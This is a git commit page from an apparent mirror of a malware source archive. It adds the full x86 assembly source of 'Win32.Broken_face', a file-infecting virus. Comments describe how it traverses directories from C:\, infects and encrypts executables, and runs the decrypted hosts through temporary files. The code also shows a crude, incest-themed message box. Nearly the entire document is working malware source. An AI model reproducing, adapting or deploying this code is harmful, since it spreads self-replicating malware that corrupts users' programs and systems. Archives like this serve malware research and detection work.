daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Updated dir structure in Win32

Browse Source
This commit is contained in:
TheDuchy
2020-10-16 23:26:21 +02:00
parent b022d14189
commit cfc6699241
173 changed files with 0 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Win32/Infector/Win32.Broken_face.asm
+342
View File
@@ -0,0 +1,342 @@
; ___________________
; | Win32.Broken_face |
; | __________________|
; ___________||
;[ Information ]
;First, virus moves to the root directory, and scans for
;directorys.It enters them and checks for executables.If
;no files found or more files needed, then looks in the
;current directory for another subdir. If there isnt any
;it goes back and enters another dir etc etc. Encrypts
;hostfiles ( marked with _ in front of their name ) and
;when its time to execute a host, it decrypts it into a
;file marked with $, executes it, and keeps deleting it
;until the file exits so the decrypted file dissapears.
;Sick method, could not think of anything else, but it
;works fine. Infected hosts keep the original size if
;they are smaller than 8192 bytes.Thats all. Be carefull
;if you think of experimenting with it,spreads faaassst.
.386
.model flat
.data
fuck dd 0
shit dd 0
ftel dd ?
tdata db 318 dup (?)
target dd ?
Nbytes dd 0
newhandle dd ?
depth db 0
filehandle db 40 dup (?)
find_data db 3180 dup (?)
xdata db 318 dup (?)
files2eat db 0eh
xhandle dd 0
msg db "There was this boy",0dh,"who had two chlidren",0dh
db "with his sisters",0dh,"They were his daughters",0dh
db "They were his favourite lovers",0dh,"I got no lips,I got no tounge"
db 0dh,"Where there were eyes there's only space",0dh
db "I got no lips, I got no tounge",0dh,"I GOT A BROKEN FACE!",0
.code
extrn ExitProcess:proc
extrn MessageBoxA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn SetCurrentDirectoryA:proc
extrn DeleteFileA:proc
extrn FindClose:proc
extrn CreateFileA:proc
extrn GetCurrentDirectoryA:proc
extrn ReadFile:proc
extrn WriteFile:proc
extrn CloseHandle:proc
extrn WinExec:proc
extrn GetCommandLineA:proc
extrn CreateProcessA:proc
start:
sub esp,1024
mov ebp,esp
call GetCommandLineA
inc eax
mov [ftel],eax
laos:
cmp byte ptr [eax],'"'
je monday
inc eax
jmp laos
monday:
mov byte ptr [eax],0
mov dword ptr [fuck],eax
push offset root
call SetCurrentDirectoryA
xor esi,esi ;for find_data
xor edi,edi ;for filehandle
find1stdir:
lea eax,[find_data+esi]
push eax
push offset dirmasker
call FindFirstFileA
mov dword ptr [filehandle+edi],eax
cmp dword ptr [find_data+esi],10h ;check if it is a dir
jne find2nddir
cmp byte ptr [find_data+esi+44],"."
je find2nddir
getin:
lea eax,[find_data+44+esi]
push eax
call SetCurrentDirectoryA
inc byte ptr [depth]
push offset xdata
push offset exefile
call FindFirstFileA
cmp eax,-1
jnz fne1
dam:
add edi,4
add esi,313
jmp find1stdir
fne1:
mov bh,byte ptr [xdata+43]
mov [xhandle],eax
jmp infect
fne2:
mov byte ptr [xdata+43],bh
push offset xdata
mov eax,[xhandle]
push eax
call FindNextFileA
or eax,eax
jz dam
infect:
cmp byte ptr [xdata+44],'_'
je fne2
mov bh,byte ptr [xdata+43]
mov byte ptr [xdata+43],'_'
push offset tdata
push offset xdata+43
call FindFirstFileA
cmp eax,-1
jnz fne2
dmf:
xor edx,edx
push edx
push 2
push 1
push edx
push edx
push 40000000h
push offset xdata+43
call CreateFileA
cmp eax,-1
je end ; failed. back in the box :(
mov [newhandle],eax
xor edx,edx
push edx
push edx
push 3
push edx
push edx
push 80000000h
push offset xdata+44
call CreateFileA
mov [target],eax
mov byte ptr [shit],66
call copyfile
call ftopen
xor edx,edx
push edx
push 80
push 3
push edx
push edx
push 40000000h
push offset xdata+44
call CreateFileA
mov [newhandle], eax
call copyfile
jmp end
getback:
cmp byte ptr [depth],0
je realend
dec byte ptr [depth]
push dword ptr [edi+filehandle]
call FindClose
sub esi,313
sub edi,4
push offset cdback
call SetCurrentDirectoryA
jmp find2nddir
goroot:
xor esi,esi
mov edi,esi
mov byte ptr [depth],0
push offset root
call SetCurrentDirectoryA ;move to c:\
find2nddir:
lea eax,[find_data+esi]
push eax
push dword ptr [filehandle+edi]
call FindNextFileA
or eax,eax
jz getback
cmp dword ptr [find_data+esi],10h
jne find2nddir
cmp byte ptr [find_data+esi+44],'.'
je find2nddir
jmp getin
end:
dec byte ptr [files2eat]
cmp byte ptr [files2eat],0
jne fne2
realend:
call dencrypt
push 5
push dword ptr [ftel]
call WinExec
cmp eax,31
jg fuckup
push 0
push offset tag+1
push offset msg
push 0
call MessageBoxA
jmp deadend
fuckup:
push dword ptr [ftel]
call DeleteFileA
or eax,eax
jz fuckup
deadend:
push 0
call ExitProcess
exefile db '*.exe',0
dirmasker db '*.',0
root db 'c:\',0
cdback db '..',0
tag db '[Broken_face',0,'coded by SuperMovah/MISP]'
copyfile:
push 0
push offset Nbytes
push 1024
push ebp
mov eax,[target]
push eax
call ReadFile
mov eax,[Nbytes]
or eax,eax
jz gbgb
cmp byte ptr [shit],66
je enchost
bck:
push 0
push offset Nbytes
push [Nbytes]
push ebp
mov eax,[newhandle]
push eax
call WriteFile
jmp copyfile
gbgb:
push dword ptr [newhandle]
call CloseHandle
push dword ptr [target]
call CloseHandle
mov byte ptr [shit],0
ret
enchost:
push esi
mov esi,ebp
mov ecx,100h
xor bx,bx
ench:
add bx,cx
xor word ptr [esi],bx
inc esi
inc esi
loop ench
pop esi
mov byte ptr [shit],66
jmp bck
dencrypt:
mov esi,dword ptr [fuck]
Tuesday:
cmp byte ptr [esi],'\'
je google
dec esi
loop Tuesday
google:
inc esi
mov al,byte ptr [esi]
mov byte ptr [esi],'_'
Friday:
inc esi
mov bl,byte ptr [esi]
mov byte ptr [esi],al
cmp byte ptr [esi],0
jz Sunday
inc esi
mov al,byte ptr [esi]
mov byte ptr [esi],bl
cmp byte ptr [esi],0
jnz Friday
Sunday:
call ftopen
mov esi, dword ptr [ftel]
ghho:
inc esi
cmp byte ptr [esi],'_'
jne ghho
mov byte ptr [esi],'$'
xor edx,edx
push edx
push 2
push 1
push edx
push 1
push 40000000h
push dword ptr [ftel]
call CreateFileA
mov [newhandle], eax
mov byte ptr [shit],66
call copyfile
ret
ftopen:
xor edx,edx
push edx
push edx
push 3
push edx
push 1
push 80000000h
push dword ptr [ftel]
call CreateFileA
mov [target],eax
ret
end start
;2-9-2004